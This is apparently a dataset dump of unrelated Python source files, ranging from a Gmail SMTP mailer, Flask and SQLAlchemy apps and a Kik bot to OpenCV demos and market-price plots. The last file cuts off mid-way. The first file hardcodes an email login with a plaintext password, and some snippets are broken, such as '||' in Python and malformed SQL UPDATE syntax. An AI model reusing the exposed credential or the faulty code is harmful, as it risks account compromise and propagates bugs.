text stringlengths 8 6.05M |
|---|
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# smtp server setup happens here
s = smtplib.SMTP(host='smtp.gmail.com', port=587)
s.starttls()
s.login('servicedesk.transcend@gmail.com', 'Alupo.Agatha&Edmond@2019')
def checkSend(variable):
# msg composition happens here
message = variable
msg = MIMEMultipart()
msg['From']='servicedesk.transcend@gmail.com'
msg['To']= 'codespeisdocs@gmail.com'
msg['Subject']= "BackUp mailing Function"
msg.attach(MIMEText(message, 'plain'))
try:
s.send_message(msg)
return ('Message sent')
except Exception as expt:
return (expt)
del msg |
# Question
#
# Given 2 strings a and b with the same length. Strings are alligned one under the other.
# We can choose an index and split both strings into 4 subtrings: a1 + a2 # and b1 + b2. Find out if it's possible to split a and b such that
# a1 + b2 or a2 + b1 forms a palindrome.
#
# Example 1:
#
# Input: a = "abcbbbb", b = "xxxbcba"
# Output: true
# Explanation:
#
# abc|bbbb
# xxx|bcba
#
# We can split the strings at index 3. We will get a1 = "abc", a2 = "bbbb" and b1 = "xxx", b2 = "bcba"
# a1 + b2 forms a palidnrome "abcbcba" so return true.
# Follow-up:
# Now it's allowed to split the strings independently:
#
# a|bcbbbb
# xxxbcb|a
# So in the exampe above a can be splitted into a1 = "a" a2 = "bcbbbb" and b can be splitted b1 = "xxxbcb" b2 = "a".
# As a result a1+ b2 forms a palindrome "aa". Find the longest palindrome.
#
def base_solution(a, b):
return find_palindrome_index(a, b) || find_palindrome_index(b, a)
def find_palindrome_index(a, b):
n = len(a)
switched = False
i, j = 0, n - 1
while i < j:
if not switched:
if a[i] != b[j]:
switched = True
# don't modify the index and come back to the
# switched branch in the next interation; we
# will check b[i] and b[j] there
continue
else:
if b[i] != b[j]:
return False
i += 1
j -= 1
return True
# I guess the candidate remember the follow up wrong?
def follow_up(a, b):
return a[0] == b[-1]
|
# -*- coding: utf-8 -*-
import psycopg2
import uuid
import logging
class Files:
'''
create schema files
create table files.files (
id varchar not null primary key,
name varchar not null,
hash varchar,
content text,
created timestamptz default now()
)
'''
'''
Crea o actualiza un documento dentro de la base
'''
def persist(self, con, id, name, mimetype, codec, data):
size = len(data) if data is not None else 0
cur = con.cursor()
if id is None:
id = str(uuid.uuid4())
#cur.execute('insert into files.files (id, name, content) values (%s,%s,%s)', (id, name, psycopg2.Binary(data)))
cur.execute('insert into files.files (id, name, mimetype, codec, size, content) values (%s,%s,%s,%s,%s,%s)', (id, name, mimetype, codec, size, data))
else:
#cur.execute('update files.files set (name = %s, content = %s) where id = %s', (name, psycopg2.Binary(data), id))
cur.execute('update files.files set (name = %s, content = %s, mimetype = %s, codec = %s, size = %s) where id = %s', (name, data, mimetype, codec, size, id))
return id
def findAllIds(self, con):
cur = con.cursor()
cur.execute('select id from files.files')
if cur.rowcount <= 0:
return []
ids = []
for c in cur:
ids.append(c[0])
return ids
def check(self, con, id):
""" chequea si existe un archivo con ese id """
cur = con.cursor()
cur.execute('select id from files.files where id = %s', (id,))
return cur.rowcount > 0
def findById(self, con, id):
cur = con.cursor()
cur.execute('select id, name, mimetype, codec, size, created, content from files.files where id = %s', (id,))
if cur.rowcount <= 0:
return None
for d in cur:
return {
'id': d[0],
'name': d[1],
'mimetype': d[2],
'codec': d[3],
'size': d[4],
'created': d[5],
'content': d[6]
}
def findMetaDataById(self, con, id):
cur = con.cursor()
cur.execute('select id, name, mimetype, codec, size, created from files.files where id = %s', (id,))
if cur.rowcount <= 0:
return None
for d in cur:
return {
'id': d[0],
'name': d[1],
'mimetype': d[2],
'codec': d[3],
'size': d[4],
'created': d[5]
}
def search(self, con, text):
'''
falta implementar
'''
def remove(self, con, id):
'''
falta implementar
'''
|
class Fibgen(object):
memo = [1, 1]
use_memo = 0
@staticmethod
def fib(use_memo=0):
Fibgen.use_memo = use_memo
x = 0
while 1:
yield Fibgen.fibber(x)
x += 1
@staticmethod
def fibber(x):
if Fibgen.use_memo and len(Fibgen.memo) > x:
return Fibgen.memo[x]
if x < 2:
return 1
new = Fibgen.fibber(x - 1) + Fibgen.fibber(x - 2)
if len(Fibgen.memo) <= x:
Fibgen.memo.append(new)
return new |
from datetime import datetime
from flask_sqlalchemy import BaseQuery
from sqlalchemy import desc
from fyyur import db
class ShowQuery(BaseQuery):
def artist_upcoming_shows(self, id_model):
return self.filter(Show.artist_id == id_model, Show.start_time >= datetime.now())
def venue_upcoming_shows(self, id_model):
return self.filter(Show.venue_id == id_model, Show.start_time >= datetime.now())
def search(self, search_term):
return self.join(Venue).join(Artist) \
.filter((Venue.name.ilike('%{0}%'.format(search_term))) | (Artist.name.ilike('%{0}%'.format(search_term)))) \
.order_by(desc(Show.start_time))
def by_artist_and_venue(self, venue_id, artist_id):
return self.filter(Show.venue_id == venue_id, Show.artist_id == artist_id)
def by_date(self, date, artist_id):
date_start = date.replace(hour=0, minute=0, second=0, microsecond=0)
date_end = date.replace(hour=23, minute=59, second=59, microsecond=0)
return self.filter(Show.start_time.between(date_start, date_end), Show.artist_id == artist_id)
class VenueQuery(BaseQuery):
def group_state_and_city(self):
return self.with_entities(Venue.state, Venue.city) \
.group_by(Venue.state, Venue.city).order_by(Venue.state, Venue.city)
def by_state_and_city(self, state, city):
return self.filter(Venue.state == state, Venue.city == city).order_by(Venue.name)
def search(self, term):
return self.filter(Venue.name.ilike('%{0}%'.format(term)))
def top_10(self):
return self.with_entities(Venue.id, Venue.name, Venue.views).filter(Venue.views > 0).order_by(desc(Venue.views)).limit(10)
class ArtistQuery(BaseQuery):
def search(self, term):
return self.filter(Artist.name.ilike('%{0}%'.format(term)))
def top_10(self):
return self.with_entities(Artist.id, Artist.name, Artist.views)\
.filter(Artist.views > 0).order_by(desc(Artist.views))\
.limit(10)
class Show(db.Model):
"""relationship N-M"""
__tablename__ = 'Shows'
query_class = ShowQuery
venue_id = db.Column(db.Integer, db.ForeignKey('Venue.id'), primary_key=True)
artist_id = db.Column(db.Integer, db.ForeignKey('Artist.id'), primary_key=True)
start_time = db.Column(db.DateTime, nullable=False)
venue = db.relationship('Venue', lazy='select', backref=db.backref("shows"))
artist = db.relationship('Artist', lazy='select', backref=db.backref("shows"))
class Venue(db.Model):
__tablename__ = 'Venue'
query_class = VenueQuery
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
city = db.Column(db.String(120))
state = db.Column(db.String(120))
address = db.Column(db.String(120))
phone = db.Column(db.String(120))
genres = db.Column(db.String(120))
image_link = db.Column(db.String(500))
facebook_link = db.Column(db.String(120))
website_link = db.Column(db.String(250))
seeking_talent = db.Column(db.Boolean)
seeking_description = db.Column(db.String(500))
views = db.Column(db.Integer, default=0)
def fill_from_dict(self, data):
self.name = data['name']
self.city = data['city']
self.state = data['state']
self.address = data['address']
self.phone = data['phone']
self.genres = ','.join(data['genres'])
self.image_link = data['image_link']
self.facebook_link = data['facebook_link']
self.website_link = data['website_link']
self.seeking_talent = data['seeking_talent']
self.seeking_description = data['seeking_description']
return self
@staticmethod
def from_dict(data):
venue = Venue()
venue.fill_from_dict(data)
return venue
class Artist(db.Model):
__tablename__ = 'Artist'
query_class = ArtistQuery
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
city = db.Column(db.String(120))
state = db.Column(db.String(120))
phone = db.Column(db.String(120))
genres = db.Column(db.String(120))
image_link = db.Column(db.String(500))
facebook_link = db.Column(db.String(120))
website_link = db.Column(db.String(250))
seeking_venue = db.Column(db.Boolean)
seeking_description = db.Column(db.String(500))
views = db.Column(db.Integer, default=0)
def fill_from_dict(self, data):
self.name = data['name']
self.city = data['city']
self.state = data['state']
self.phone = data['phone']
self.genres = ','.join(data['genres'])
self.image_link = data['image_link']
self.facebook_link = data['facebook_link']
self.website_link = data['website_link']
self.seeking_venue = data['seeking_venue']
self.seeking_description = data['seeking_description']
return self
@staticmethod
def from_dict(data):
artist = Artist()
artist.fill_from_dict(data)
return artist
|
from flask import Flask, request, Response
from kik import KikApi, Configuration
from kik.messages import messages_from_json, TextMessage
from wikt import WiktionarySearch
import os
from os import environ
app = Flask(__name__)
kik = KikApi("etybot", environ['BOT_API_KEY'])
kik.set_configuration(Configuration(webhook=environ['WEBHOOK']))
@app.route('/incoming', methods=['POST'])
def incoming():
if not kik.verify_signature(request.headers.get('X-Kik-Signature'), request.get_data()):
return Response(status=403)
messages = messages_from_json(request.json['messages'])
for message in messages:
ws = WiktionarySearch(message.body.lower())
if (ws.existe()):
if isinstance(message, TextMessage):
kik.send_messages([
TextMessage(
to=message.from_user,
chat_id=message.chat_id,
body=ws.getEty()
)
])
else:
if isinstance(message, TextMessage):
kik.send_messages([
TextMessage(
to=message.from_user,
chat_id=message.chat_id,
body="no"
)
])
return Response(status=200)
if __name__ == "__main__":
app.run(port=80, debug=True)
|
#!/usr/bin/env python3
import time
from flask import Flask
import secret
import config
from models.base_model import db
from routes.index import main as index_routes
from routes.topic import main as topic_routes
from routes.reply import main as reply_routes
from routes.user import main as user_routes
from routes.board import main as board_routes
from routes.message import main as mail_routes
from routes.reset import main as reset_routes
from routes.setting import main as setting_routes
from utils import log
def count(input):
# log('count using jinja filter')
if input is None:
return 0
return len(input)
def format_time(unix_timestamp):
# enum Year():
# 2013
# 13
# f = Year.2013
f = '%Y-%m-%d %H:%M:%S'
value = time.localtime(unix_timestamp)
formatted = time.strftime(f, value)
return formatted
def time_between_now(unix_timestamp):
"""
计算到现在间隔了多少时间,如果超过一年,就是 x 年前,如果超过一个月,就是 x 个月前,以此类推到 x 秒前。
:param unix_timestamp:
:return:
"""
now = int(time.time())
now_dict = time_dict(now)
t_dict = time_dict(unix_timestamp)
# log('t_dict and now_dict', t_dict, now_dict)
year_from_now = now_dict['year'] - t_dict['year']
month_from_now = now_dict['month'] - t_dict['month']
day_from_now = now_dict['day'] - t_dict['day']
hour_from_now = now_dict['hour'] - t_dict['hour']
minute_from_now = now_dict['minute'] - t_dict['minute']
second_from_now = now_dict['second'] - t_dict['second']
if year_from_now > 0:
return str(year_from_now) + "年前"
if month_from_now > 0:
return str(month_from_now) + "个月前"
if day_from_now > 0:
return str(day_from_now) + "天前"
if hour_from_now > 0:
return str(hour_from_now) + "小时前"
if minute_from_now > 1:
return str(minute_from_now) + "分钟前"
if second_from_now > 0:
return str(second_from_now) + "秒前"
def time_dict(unix_timestamp):
"""
使用字典存储时间
{'year': 2019, 'month': 6, 'day': 18, 'hour': 8, 'minute': 56, 'second': 14}
:param unix_timestamp:
:return:
"""
t = format_time(unix_timestamp)
# 2019-06-18 00:43:41
date_of_time = t.split(' ')[0].split('-')
clock_of_time = t.split(' ')[1].split(':')
time_dict = dict(
year=int(date_of_time[0]),
month=int(date_of_time[1]),
day=int(date_of_time[2]),
hour=int(clock_of_time[0]),
minute=int(clock_of_time[1]),
second=int(clock_of_time[2]),
)
return time_dict
def configured_app():
# web framework
# web application
# __main__
app = Flask(__name__)
# 设置 secret_key 来使用 flask 自带的 session
# 这个字符串随便你设置什么内容都可以
app.secret_key = secret.secret_key
uri = 'mysql+pymysql://root:{}@localhost/bbs?charset=utf8mb4'.format(
secret.database_password
)
app.config['SQLALCHEMY_DATABASE_URI'] = uri
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.init_app(app)
register_routes(app)
return app
def register_routes(app):
"""
在 flask 中,模块化路由的功能由 蓝图(Blueprints)提供
蓝图可以拥有自己的静态资源路径、模板路径(现在还没涉及)
用法如下
"""
# 注册蓝图
# 有一个 url_prefix 可以用来给蓝图中的每个路由加一个前缀
app.register_blueprint(index_routes)
app.register_blueprint(topic_routes, url_prefix='/topic')
app.register_blueprint(reply_routes, url_prefix='/reply')
app.register_blueprint(board_routes, url_prefix='/board')
app.register_blueprint(mail_routes, url_prefix='/mail')
app.register_blueprint(reset_routes, url_prefix='/reset')
app.register_blueprint(setting_routes, url_prefix='/setting')
app.register_blueprint(user_routes, url_prefix='/user')
app.template_filter()(count)
app.template_filter()(format_time)
app.template_filter()(time_between_now)
# 运行代码
if __name__ == '__main__':
app = configured_app()
# debug 模式可以自动加载你对代码的变动, 所以不用重启程序
# host 参数指定为 '0.0.0.0' 可以让别的机器访问你的代码
# 自动 reload jinja
app.config['TEMPLATES_AUTO_RELOAD'] = True
app.jinja_env.auto_reload = True
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
config = dict(
debug=True,
host='localhost' ,
port=3000,
threaded=True,
)
app.run(**config)
|
# coding:utf-8
# Python内置的range函数可以迭代地生成一组数字序列
for number in range(10):
print(number)
# len函数用于获取一个数组的长度,将range函数与len函数相组合,就可以实现遍历数组的功能
array = ['a', 'b', 'c', 'd', 'e']
for index in range(len(array)):
print(index, array[index])
|
ifuser = "admin"
ifpass = ""
ifdb = ""
ifhost = "127.0.0.1"
ifport = 8086 |
# coding: utf-8
# In[1]:
import cv2
import numpy as np
import imutils
# In[2]:
'''Using OpenCV, addition/subtraction of images performs clipping i.e. values falling outside the range [0,255]
are clipped'''
img = cv2.imread('./datasets/flower1.jpg')
matrix = np.ones(img.shape, dtype='uint8')*100
added_image = cv2.add(img,matrix)
cv2.imshow('Added_Image', added_image)
cv2.waitKey(0)
# In[3]:
#Subtracting the images
matrix2 = np.ones(img.shape,dtype='uint8')*50
subtract_image = cv2.subtract(img, matrix2)
cv2.imshow('Subtracted_Image', subtract_image)
cv2.waitKey(0)
# In[ ]:
'''In case of adding 2 numpy arrays using np.sum, if a value falls outside 255 let's say 260, the value
will be wrapped around which would be 5 '''
|
#%%
import fisherMarket as m
import matplotlib.pyplot as plt
import numpy as np
############################### Example 1 ######################################
# Matrix of valuations: |buyers| x |goods|
valuations = np.array([[1, 2, 3], [3, 2, 1]])
# Budgets of buyers: |buyers|
budgets = np.array([0.0, 10.0])
iter = 0
prices = []
budgets0 = []
budgets1 = []
while(iter <= 100):
iter += 1
# Create Market
market1 = m.FisherMarket(valuations, budgets)
# Solve for market prices and allocations for desired utility function structure.
# Current Options are 'quasi-linear' and 'linear'
Q, p = market1.solveMarket("linear", printResults = False)
prices.append(p)
budgets0.append(budgets[0])
budgets1.append(budgets[1])
# print(f"budget[0] = {budgets[0]}\nbudget[1] = {budgets[1]}")
budgets[0] += 0.1
budgets[1] -= 0.1
prices = np.array(prices)
fig = plt.figure(figsize = (12,5))
ax1 = plt.subplot(1, 2, 1)
ax1.plot(budgets0, prices[:,0], "-g", label = "Good 1")
ax1.plot(budgets0, prices[:,1], "-b", label = "Good 2")
ax1.plot(budgets0, prices[:,2], "-r", label = "Good 3")
plt.title("Linear: Prices vs Budget of Buyer 1\nValuations: [1, 2, 3]")
plt.xlabel("Budget of Buyer 1")
plt.ylabel("Prices")
ax2 = plt.subplot(1, 2, 2)
ax2.plot(budgets1, prices[:,0], "-g", label = "Good 1")
ax2.plot(budgets1, prices[:,1], "-b", label = "Good 2")
ax2.plot(budgets1, prices[:,2], "-r", label = "Good 3")
plt.title("Linear: Prices vs Budget of Buyer 2\nValuations: [3, 2, 1]")
plt.xlabel("Budget of Buyer 2")
plt.ylabel("Prices")
plt.legend()
plt.savefig("graph1.png")
############################### Example 2 ######################################
# Matrix of valuations: |buyers| x |goods|
valuations = np.array([[5, 2, 1], [4, 2, 3]])
# Budgets of buyers: |buyers|
budgets = np.array([0.0, 10.0])
iter = 0
prices = []
budgets0 = []
budgets1 = []
while(iter <= 100):
iter += 1
# Create Market
market1 = m.FisherMarket(valuations, budgets)
# Solve for market prices and allocations for desired utility function structure.
# Current Options are 'quasi-linear' and 'linear'
Q, p = market1.solveMarket("linear", printResults = False)
prices.append(p)
budgets0.append(budgets[0])
budgets1.append(budgets[1])
# print(f"budget[0] = {budgets[0]}\nbudget[1] = {budgets[1]}")
budgets[0] += 0.1
budgets[1] -= 0.1
prices = np.array(prices)
fig = plt.figure(figsize = (12,5))
ax1 = plt.subplot(1, 2, 1)
ax1.plot(budgets0, prices[:,0], "-g", label = "Good 1")
ax1.plot(budgets0, prices[:,1], "-b", label = "Good 2")
ax1.plot(budgets0, prices[:,2], "-r", label = "Good 3")
plt.title("Linear: Prices vs Budget of Buyer 1\nValuations: [5 , 2, 1]")
plt.xlabel("Budget of Buyer 1")
plt.ylabel("Prices")
ax2 = plt.subplot(1, 2, 2)
ax2.plot(budgets1, prices[:,0], "-g", label = "Good 1")
ax2.plot(budgets1, prices[:,1], "-b", label = "Good 2")
ax2.plot(budgets1, prices[:,2], "-r", label = "Good 3")
plt.title("Linear: Prices vs Budget of Buyer 2\nValuations: [4 , 2, 3]")
plt.xlabel("Budget of Buyer 2")
plt.ylabel("Prices")
plt.legend()
plt.savefig("graph2.png")
############################### Example 3 : When goods are not good ######################################
# Matrix of valuations: |buyers| x |goods|
valuations = np.array([[2, 0, 1], [0, 2, 1]])
# Budgets of buyers: |buyers|
budgets = np.array([0.0, 10.0])
iter = 0
prices = []
budgets0 = []
budgets1 = []
while(iter <= 100):
iter += 1
# Create Market
market1 = m.FisherMarket(valuations, budgets)
# Solve for market prices and allocations for desired utility function structure.
# Current Options are 'quasi-linear' and 'linear'
Q, p = market1.solveMarket("linear", printResults = False)
prices.append(p)
budgets0.append(budgets[0])
budgets1.append(budgets[1])
# print(f"budget[0] = {budgets[0]}\nbudget[1] = {budgets[1]}")
budgets[0] += 0.1
budgets[1] -= 0.1
prices = np.array(prices)
fig = plt.figure(figsize = (12,5))
ax1 = plt.subplot(1, 2, 1)
ax1.plot(budgets0, prices[:,0], "-g", label = "Good 1")
ax1.plot(budgets0, prices[:,1], "-b", label = "Good 2")
ax1.plot(budgets0, prices[:,2], "-r", label = "Good 3")
plt.title("Linear: Prices vs Budget of Buyer 1\nValuations: [2, 0, 1]")
plt.xlabel("Budget of Buyer 1")
plt.ylabel("Prices")
ax2 = plt.subplot(1, 2, 2)
ax2.plot(budgets1, prices[:,0], "-g", label = "Good 1")
ax2.plot(budgets1, prices[:,1], "-b", label = "Good 2")
ax2.plot(budgets1, prices[:,2], "-r", label = "Good 3")
plt.title("Linear: Prices vs Budget of Buyer 2\nValuations: [0, 2, 1]")
plt.xlabel("Budget of Buyer 2")
plt.ylabel("Prices")
plt.legend()
plt.savefig("graph3.png")
####################### Quasilinear #######################
############################### Example 1 ######################################
# Matrix of valuations: |buyers| x |goods|
valuations = np.array([[1, 2, 3], [3, 2, 1]])
# Budgets of buyers: |buyers|
budgets = np.array([0.0, 10.0])
iter = 0
prices = []
budgets0 = []
budgets1 = []
while(iter <= 100):
iter += 1
# Create Market
market1 = m.FisherMarket(valuations, budgets)
# Solve for market prices and allocations for desired utility function structure.
# Current Options are 'quasi-linear' and 'linear'
Q, p = market1.solveMarket("quasi-linear", printResults = False)
prices.append(p)
budgets0.append(budgets[0])
budgets1.append(budgets[1])
# print(f"budget[0] = {budgets[0]}\nbudget[1] = {budgets[1]}")
budgets[0] += 0.1
budgets[1] -= 0.1
prices = np.array(prices)
fig = plt.figure(figsize = (12,5))
ax1 = plt.subplot(1, 2, 1)
ax1.plot(budgets0, prices[:,0], "-g", label = "Good 1")
ax1.plot(budgets0, prices[:,1], "-b", label = "Good 2")
ax1.plot(budgets0, prices[:,2], "-r", label = "Good 3")
plt.title("Quasi: Prices vs Budget of Buyer 1\nValuations: [1, 2, 3]")
plt.xlabel("Budget of Buyer 1")
plt.ylabel("Prices")
ax2 = plt.subplot(1, 2, 2)
ax2.plot(budgets1, prices[:,0], "-g", label = "Good 1")
ax2.plot(budgets1, prices[:,1], "-b", label = "Good 2")
ax2.plot(budgets1, prices[:,2], "-r", label = "Good 3")
plt.title("Prices vs Budget of Buyer 2\nValuations: [3, 2, 1]")
plt.xlabel("Budget of Buyer 2")
plt.ylabel("Prices")
plt.legend()
plt.savefig("graph4.png")
############################### Example 2 ######################################
# Matrix of valuations: |buyers| x |goods|
valuations = np.array([[5, 2, 1], [4, 2, 3]])
# Budgets of buyers: |buyers|
budgets = np.array([0.0, 10.0])
iter = 0
prices = []
budgets0 = []
budgets1 = []
while(iter <= 100):
iter += 1
# Create Market
market1 = m.FisherMarket(valuations, budgets)
# Solve for market prices and allocations for desired utility function structure.
# Current Options are 'quasi-linear' and 'linear'
Q, p = market1.solveMarket("quasi-linear", printResults = False)
prices.append(p)
budgets0.append(budgets[0])
budgets1.append(budgets[1])
# print(f"budget[0] = {budgets[0]}\nbudget[1] = {budgets[1]}")
budgets[0] += 0.1
budgets[1] -= 0.1
prices = np.array(prices)
fig = plt.figure(figsize = (12,5))
ax1 = plt.subplot(1, 2, 1)
ax1.plot(budgets0, prices[:,0], "-g", label = "Good 1")
ax1.plot(budgets0, prices[:,1], "-b", label = "Good 2")
ax1.plot(budgets0, prices[:,2], "-r", label = "Good 3")
plt.title("Quasi: Prices vs Budget of Buyer 1\nValuations: [5, 2, 1]")
plt.xlabel("Budget of Buyer 1")
plt.ylabel("Prices")
ax2 = plt.subplot(1, 2, 2)
ax2.plot(budgets1, prices[:,0], "-g", label = "Good 1")
ax2.plot(budgets1, prices[:,1], "-b", label = "Good 2")
ax2.plot(budgets1, prices[:,2], "-r", label = "Good 3")
plt.title("Quasi: Prices vs Budget of Buyer 2\nValuations: [4, 2, 3]")
plt.xlabel("Budget of Buyer 2")
plt.ylabel("Prices")
plt.legend()
plt.savefig("graph5.png")
############################### Example 3 : When goods are not good ######################################
# Matrix of valuations: |buyers| x |goods|
valuations = np.array([[2, 0, 1], [0, 2, 1]])
# Budgets of buyers: |buyers|
budgets = np.array([0.0, 10.0])
iter = 0
prices = []
budgets0 = []
budgets1 = []
while(iter <= 100):
iter += 1
# Create Market
market1 = m.FisherMarket(valuations, budgets)
# Solve for market prices and allocations for desired utility function structure.
# Current Options are 'quasi-linear' and 'linear'
Q, p = market1.solveMarket("quasi-linear", printResults = False)
prices.append(p)
budgets0.append(budgets[0])
budgets1.append(budgets[1])
# print(f"budget[0] = {budgets[0]}\nbudget[1] = {budgets[1]}")
budgets[0] += 0.1
budgets[1] -= 0.1
prices = np.array(prices)
fig = plt.figure(figsize = (12,10))
ax1 = plt.subplot(1, 2, 1)
ax1.plot(budgets0, prices[:,0], "-g", label = "Good 1")
ax1.plot(budgets0, prices[:,1], "-b", label = "Good 2")
ax1.plot(budgets0, prices[:,2], "-r", label = "Good 3")
plt.title("Quasi: Prices vs Budget of Buyer 1\nValuations: [2, 0, 1]")
plt.xlabel("Budget of Buyer 1")
plt.ylabel("Prices")
ax2 = plt.subplot(1, 2, 2)
ax2.plot(budgets1, prices[:,0], "-g", label = "Good 1")
ax2.plot(budgets1, prices[:,1], "-b", label = "Good 2")
ax2.plot(budgets1, prices[:,2], "-r", label = "Good 3")
plt.title("Quasi: Prices vs Budget of Buyer 2\nValuations: [0, 2, 1]")
plt.xlabel("Budget of Buyer 2")
plt.ylabel("Prices")
plt.legend()
plt.savefig("graph6.png")
############################### Example 4 : More than 2 buyers ######################################
# Matrix of valuations: |buyers| x |goods|
valuations = np.array([[2, 1, 1], [1, 2, 1], [1, 1, 2]])
# Budgets of buyers: |buyers|
budgets = np.array([10.0, 0.0, 0.0])
iter = 0
prices = []
budgets0 = []
budgets1 = []
budgets2 = []
while(iter <= 100):
iter += 1
# Create Market
market1 = m.FisherMarket(valuations, budgets)
# Solve for market prices and allocations for desired utility function structure.
# Current Options are 'quasi-linear' and 'linear'
Q, p = market1.solveMarket("quasi-linear", printResults = False)
prices.append(p)
budgets0.append(budgets[0])
budgets1.append(budgets[1])
budgets2.append(budgets[2])
# print(f"budget[0] = {budgets[0]}\nbudget[1] = {budgets[1]}")
budgets[0] -= 0.1
budgets[1] += 0.05
budgets[2] += 0.05
prices = np.array(prices)
fig = plt.figure(figsize = (12,4))
ax1 = plt.subplot(1, 3, 1)
ax1.plot(budgets0, prices[:,0], "-g", label = "Good 1")
ax1.plot(budgets0, prices[:,1], "-b", label = "Good 2")
ax1.plot(budgets0, prices[:,2], "--r", label = "Good 3")
plt.title("Quasi: Prices vs Budget of Buyer 1\nValuations: [2, 1, 1]")
plt.xlabel("Budget of Buyer 1")
plt.ylabel("Prices")
ax2 = plt.subplot(1, 3, 2)
ax2.plot(budgets1, prices[:,0], "-g", label = "Good 1")
ax2.plot(budgets1, prices[:,1], "-b", label = "Good 2")
ax2.plot(budgets1, prices[:,2], "--r", label = "Good 3")
plt.title("Quasi: Prices vs Budget of Buyer 2\nValuations: [1, 2, 1]")
plt.xlabel("Budget of Buyer 2")
plt.ylabel("Prices")
ax3 = plt.subplot(1, 3, 3)
ax3.plot(budgets2, prices[:,0], "-g", label = "Good 1")
ax3.plot(budgets2, prices[:,1], "-b", label = "Good 2")
ax3.plot(budgets2, prices[:,2], "--r", label = "Good 3")
plt.title("Quasi: Prices vs Budget of Buyer 3\nValuations: [1, 1, 2]")
plt.xlabel("Budget of Buyer 3")
plt.ylabel("Prices")
plt.legend()
plt.savefig("graph7.png")
############## Individual Markets of The economy example ##################
############################### Example 1 ######################################
# Matrix of valuations: |buyers| x |goods|
# Matrix of valuations of buyers/workers: |buyers| x |goods|
demandV = np.array([[8.0, 2.0], [2.0, 5.0]])
# Matrix of valuations of firms: |firms| x |workers|
supplyV = np.array([[5.0, 3.0], [1.0, 5.0]])
# Budgets of firms: |buyers|
budgets = np.array([0.0, 10.0])
iter = 0
prices = []
wages = []
budgets0 = []
budgets1 = []
while(iter <= 100):
iter += 1
# Create Market
demand = m.FisherMarket(demandV, budgets)
supply = m.FisherMarket(supplyV, budgets)
# Solve for market prices and allocations for desired utility function structure.
# Current Options are 'quasi-linear' and 'linear'
Q, p = demand.solveMarket("linear", printResults = False)
X, w = supply.solveMarket("linear", printResults = False)
wages.append(w)
prices.append(p)
budgets0.append(budgets[0])
budgets1.append(budgets[1])
# print(f"budget[0] = {budgets[0]}\nbudget[1] = {budgets[1]}")
budgets[0] += 0.1
budgets[1] -= 0.1
prices = np.array(prices)
fig = plt.figure(figsize = (12,5))
ax1 = plt.subplot(1, 2, 1)
ax1.plot(budgets0, prices[:,0], "-g", label = "Good 1")
ax1.plot(budgets0, prices[:,1], "-b", label = "Good 2")
plt.title("Linear: Prices vs Budget of Buyer 1\nValuations: [8.0, 2.0], [2.0, 5.0]")
plt.xlabel("Budget of Buyer 1")
plt.ylabel("Prices")
ax2 = plt.subplot(1, 2, 2)
ax2.plot(budgets1, prices[:,0], "-g", label = "Good 1")
ax2.plot(budgets1, prices[:,1], "-b", label = "Good 2")
plt.title("Linear: Prices vs Budget of Buyer 2\nValuations: [8.0, 2.0], [2.0, 5.0]")
plt.xlabel("Budget of Buyer 2")
plt.ylabel("Wages")
plt.legend()
wages = np.array(wages)
fig = plt.figure(figsize = (12,5))
ax1 = plt.subplot(1, 2, 1)
ax1.plot(budgets0, wages[:,0], "-g", label = "Good 1")
ax1.plot(budgets0, wages[:,1], "-b", label = "Good 2")
plt.title("Linear: Wages vs Budget of Firms 1\nValuations: [5.0, 3.0], [1.0, 5.0]")
plt.xlabel("Budget of firm 1")
plt.ylabel("Prices")
ax2 = plt.subplot(1, 2, 2)
ax2.plot(budgets1, wages[:,0], "-g", label = "Good 1")
ax2.plot(budgets1, wages[:,1], "-b", label = "Good 2")
plt.title("Linear: Wages vs Budget of Firms 2\nValuations: [5.0, 3.0], [1.0, 5.0]")
plt.xlabel("Budget of firm 2")
plt.ylabel("Prices")
plt.legend()
# %%
|
try:
# for Python2
from Tkinter import *
except ImportError:
# for Python3
from tkinter import *
import time
import datetime as dt
import json
from time import sleep
from tkinter import *
from tkinter import ttk
from PIL import ImageTk,Image
import json
import datetime as dt
import time
execution_count = 0
t_now = dt.datetime.now()
# path to reminders.txt file
REM_FILE = "json/abf.txt"
a = []
execution_count=0
# root (top level element) config
class REMINDER():
def __init__(self):
# root (top level element) config
self.root = Tk()
self.root.geometry("250x150+480+200")
#self.root.geometry('%dx%d+%d+%d' % (220,270, 1050, 380))
self.root.title("IALrt")
self.root.iconbitmap("C:/Users/Arpit/Pictures/exercise.ico")
# Collect time information
#t_now = dt.datetime.now() # Current time for reference. [datetime object]
#t_pom = 25*60 # Pomodoro time [int, seconds]
#t_delta = dt.timedelta(0,t_pom) # Time delta in mins [datetime object]
#t_fut = t_now + t_delta # Future time for reference [datetime object]
#delta_sec = 1#60 # Break time, after pomodoro [int, seconds]
#t_fin = t_now + dt.timedelta(0,t_pom+delta_sec) # Final time (w/ 5 mins break) [datetime object]
# main frame (inside root) config
self.mainFrame = Frame(self.root, padx=10, pady = 10)
self.mainFrame.pack()
# first field frame (inside main frame) config
self.fieldRow1 = Frame(self.mainFrame, padx=5, pady=5)
Label(self.fieldRow1, text="Current Time: "+t_now.strftime("%I:%M %p")).grid(row=0, column=0)
#self.rem = Entry(self.fieldRow1)
#self.rem.grid(row=0, column=1)
self.fieldRow1.pack()
# second field frame (inside main frame) config
# self.fieldRow2 = Frame(self.mainFrame, padx=5, pady=5)
# Label(self.fieldRow2, text="Active Between:", width=15).grid(row=0, column=0)
# self.hrs1 = Entry(self.fieldRow2, width=5)
# OptionMenu(self.fieldRow2, self.mins2,"00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11",
# "12", "13", "14", "15", "16", "17", "18", "19", "20", "21", "22", "23", "24", "25","26", "27", "28", "29", "30", "31", "32", "33", "34", "35",
# "36", "37", "38", "39", "40", "41", "42", "43", "44", "45", "46", "47", "48", "49", "50", "51", "52", "53", "54", "55", "56", "57", "58", "59", "60").grid(row=1, column=3)
# self.clk2 = StringVar()
# self.clk2.set('PM')
# OptionMenu(self.fieldRow2, self.clk2, 'AM', 'PM').grid(row=1, column=4)
# self.fieldRow2.pack()
self.fieldRow3 = Frame(self.mainFrame, padx=5, pady=5)
Label(self.fieldRow3, text="Reminder frequency (minutes):", width=25).grid(row=2, column=0)
self.minsfrequency = Entry(self.fieldRow3, width=5)
self.minsfrequency.grid(row=2, column=1)
